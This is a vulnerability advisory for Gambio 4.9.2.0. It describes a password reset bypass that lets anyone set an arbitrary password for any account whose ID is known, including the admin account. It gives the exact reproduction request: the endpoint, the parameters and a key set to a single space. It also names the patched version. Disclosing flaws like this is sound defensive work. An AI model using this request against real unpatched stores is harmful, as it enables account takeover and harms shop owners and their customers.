Gambio Password Reset Bypass Vulnerability Allowing Arbitrary Passwords for Any Account

A vulnerability in Gambio version 4.9.2.0 has been identified, allowing the password reset function to be bypassed. This issue enables users to set arbitrary passwords for any account, provided the account ID is known. The vulnerability arises because the password reset token validation can be circumvented by inserting a space character, effectively exploiting the token verification process.

Impact

Exploitation of this vulnerability allows for unauthorized password changes, leading to potential account takeovers.

Reproduction

To reproduce this vulnerability, send a POST request to 'password_double_opt.php' with the 'action' parameter set to 'save_password'. Include the 'customers_id' parameter with the ID of the account (typically '1' for the admin account') and the 'key' parameter set to a space ('%20'). The 'newPassword' and 'confirmedPassword' parameters should be filled with the desired new password. The request will be processed without a valid reset token, successfully changing the password for the specified account.

Remediation

Users can update to Gambio version 4.9.2.1, which addresses this vulnerability.